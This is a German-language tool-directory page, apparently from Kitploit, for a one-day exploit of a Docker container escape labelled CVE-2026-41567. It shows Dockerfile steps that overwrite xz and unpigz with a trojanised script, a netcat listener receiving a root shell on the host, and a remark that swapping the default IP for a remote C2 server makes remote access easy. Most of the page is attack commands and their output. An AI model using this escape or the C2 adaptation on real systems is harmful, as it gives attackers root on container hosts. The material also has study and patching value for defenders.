Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-41567 — Nutzt CVE-2026-41567 Docker-Escape mithilfe trojanisierter xz/unpigz-Binaries aus, um von innerhalb eines Containers eine Root-Shell auf dem Host zu erlangen. | Kitploit
Tools/GitHubGitHub/berdav/cve-2026-41567
SchwachstellenanalyseExploitationContainer-Ausbruch
GitHubberdav/cve-2026-41567

CVE-2026-41567

Nutzt CVE-2026-41567 Docker-Escape mithilfe trojanisierter xz/unpigz-Binaries aus, um von innerhalb eines Containers eine Root-Shell auf dem Host zu erlangen.

Repository anzeigen
vor 1 TagNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-41567 1-Tages-Exploit

Ein 1-Tages-Exploit für Docker Escape CVE-2026-41567.

Es ist eine Demonstration eines Docker-Escape mit trojanisierten xz / unpigz.

Es kann einfach für den Fernzugriff angepasst werden (d.h. einfach die Docker-Standard-IP durch eine entfernte C2 ersetzen).

Weitere Informationen zum Exploit hier

PoC

Führen Sie einen Netcat-Listener auf Port 50005 auf dem Host aus.

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ nc -vlp  50005
Listening on 0.0.0.0 50005
Connection received on ubuntu-noble 35722
# whoami
root
# cat /etc/hostname
ubuntu-noble
# exit

Führen Sie dann das Skript test.sh aus. Wenn der Exploit funktioniert, erhalten Sie sofort eine Root-Shell.

root@kitploit:~
ubuntu@ubuntu-noble:~/CVE-2026-41567$ sudo ./test.sh
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
            Install the buildx component to build images with BuildKit:
            https://docs.docker.com/go/buildx/

Sending build context to Docker daemon  19.97kB
Step 1/7 : FROM debian
 ---> 34cd9e9fd437
Step 2/7 : RUN apt update && apt install -y ncat
 ---> Using cache
 ---> c85c9eb10bff
Step 3/7 : COPY exploit.sh /usr/bin/xz
 ---> Using cache
 ---> b84efa8058e7
Step 4/7 : RUN chmod +x /usr/bin/xz
 ---> Using cache
 ---> 423b0e1891a6
Step 5/7 : COPY exploit.sh /usr/bin/unpigz
 ---> Using cache
 ---> 74eff85cf988
Step 6/7 : RUN chmod +x /usr/bin/unpigz
 ---> Using cache
 ---> 2f773fa12931
Step 7/7 : CMD [ "sleep", "9999999" ]
 ---> Using cache
 ---> 7b99f12dbe8d
Successfully built 7b99f12dbe8d
Successfully tagged cve-2026-41567:latest
cve-2026-41567
5679a4dc643c65a20039de693fad1f1caeea7fe5760b5c4049d1d4f37f5ab825
tar: Removing leading `/' from member names
/etc/hosts
Successfully copied 0B to cve-2026-41567:/tmp

Beachten Sie, dass Sie über Berechtigungen verfügen müssen, um mit dem Docker-Daemon zu kommunizieren (in der Regel als Root).

Tool herunterladen